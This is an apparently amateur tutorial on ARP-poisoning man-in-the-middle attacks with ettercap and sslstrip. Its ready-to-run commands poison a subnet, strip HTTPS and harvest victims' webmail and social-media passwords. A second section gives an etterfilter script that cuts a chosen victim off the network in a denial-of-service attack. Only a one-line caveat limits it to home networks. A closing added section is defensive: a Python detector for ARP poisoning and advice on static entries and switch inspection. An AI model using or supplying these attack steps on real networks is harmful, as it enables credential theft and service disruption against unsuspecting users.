Man In the Middle Attack with Ettercap

Only test this on your home network, nowhere else. This guide is more of a reference for launching a man-in-the-middle attack to view the traffic of victims on the network, using ettercap along with sslstrip to strip the encryption from important HTTPS traffic. I have done this on wired LANs using Backtrack. I have yet to get it to work wirelessly.

To begin we want to enable packet forwarding with this command:

echo 1 > /proc/sys/net/ipv4/ip_forward

Then cat the file to see whether it is enabled. An output of 1 means enabled and 0 means not enabled.

cat /proc/sys/net/ipv4/ip_forward

We will now edit our etter.conf configuration file to use iptables. In Backtrack the file is located at /etc/etter.conf
Uncomment the two commented lines following the statement "if you use iptables" by removing the comment hashes in front of the redir_command_on and redir_command_off lines you see below, but make sure to leave the one beside the words "if you use iptables":

#if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

In the same file, also change the ec_uid and ec_gid numbers to zero so Ettercap runs as root instead of dropping privileges.

[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default

Now use this iptables command to add a rule to the nat table that redirects TCP traffic destined for port 80 to port 8080:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Once we have scanned the network for targets and know which IP address belongs to which host, we can begin the poisoning by becoming man in the middle. The following will start ettercap using a range of IP addresses along with the autoadd plugin, which means victims who join the network or reconnect to it after you began the scan will be poisoned as well. In this example 192.168.1.1 is the router and ettercap will poison targets up to 192.168.1.5

sudo ettercap -Tq -M arp:remote /192.168.1.1-5/ -P autoadd
Or, less specifically, the following poisons everyone in the subnet, but be careful: this can bring a network to a crawl:
ettercap -TqM ARP:REMOTE // //

Now tell sslstrip to listen (-l) on port 8080:
sslstrip -a -l 8080

Now watch people's Hotmail, Facebook and any other passwords that are supposedly protected by SSL roll in as they log in. Ettercap will display the output. Now let's dig deeper and manipulate people's packets as they are routed through our computer.

DoS Attacking with Ettercap

First off, always re-enable packet forwarding, because by default it will turn off when you stop an Ettercap poison. Here is the command:

echo 1 > /proc/sys/net/ipv4/ip_forward

Now let's do a DoS attack with ettercap. The first thing we want to do is create a file with instructions to drop packets from and to a target host. Make a file called dos.eft

Put these lines of code in it, but make sure to change both "Target IP" fields to that of your victim.

if (ip.src == 'Target IP' || ip.dst == 'Target IP') {
    drop();
    kill();
    msg("Packet Dropped\n");
}

Go to the directory you saved your file/script in and compile it into an ettercap filter with this command:

etterfilter dos.eft -o dos.ef

Lastly we become man in the middle.
-F specifies what filter we want to use. In this case it’s dos.ef
I was targeting 192.168.1.112 so I chose it for this example:

ettercap -T -q -F dos.ef -M ARP /192.168.1.112/ // -i (network interface)

You should see Ettercap displaying lots of “Packet Dropped” messages. ;-)
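
Both the sslstrip setup and the DoS filter above depend on ARP poisoning, and that is visible in a victim's own ARP cache: the router's IP suddenly maps to a different MAC, and one MAC answers for several IPs. The following is an added example, not part of the original guide, that checks a Linux /proc/net/arp snapshot for both signs; the MAC addresses and the 192.168.1.50 host are constructed sample values, and the function names are hypothetical.

```python
"""Flag signs of ARP cache poisoning in a Linux /proc/net/arp snapshot."""
from collections import defaultdict

# Constructed sample data (not captured from a real network): a host's ARP
# cache before and during poisoning. 192.168.1.1 is the router, as on the page.
CLEAN = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         02:00:00:00:00:01     *        eth0
192.168.1.50     0x1         0x2         02:00:00:00:00:50     *        eth0
192.168.1.77     0x1         0x0         00:00:00:00:00:00     *        eth0
"""
POISONED = CLEAN.replace("02:00:00:00:00:01", "02:00:00:00:00:50")


def parse_arp_table(text):
    """Return {ip: mac} for resolved entries, skipping the header row."""
    table = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, flags, mac = fields[0], fields[2], fields[3].lower()
        # Flag bit 0x2 (ATF_COM) marks a completed entry; 0x0 is unresolved.
        if int(flags, 16) & 0x2 and mac != "00:00:00:00:00:00":
            table[ip] = mac
    return table


def find_poisoning(text, gateway_ip, known_gateway_mac):
    """Return a list of findings; an empty list means nothing suspicious."""
    table = parse_arp_table(text)
    known = known_gateway_mac.lower()
    findings = []
    current = table.get(gateway_ip)
    if current and current != known:
        findings.append(f"gateway {gateway_ip} is now {current}, expected {known}")
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        # One MAC answering for several IPs is typical of a poisoner, but
        # proxy ARP and multi-homed routers also cause it, so verify by hand.
        if len(ips) > 1:
            findings.append(f"{mac} claims {', '.join(sorted(ips))}")
    return findings


if __name__ == "__main__":
    for name, snap in (("clean", CLEAN), ("poisoned", POISONED)):
        print(name, find_poisoning(snap, "192.168.1.1", "02:00:00:00:00:01"))
```

On a real host, pass it the contents of /proc/net/arp and a gateway MAC recorded while the network was known to be good. A static ARP entry for the gateway on hosts, or Dynamic ARP Inspection on managed switches, prevents the cache change in the first place.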
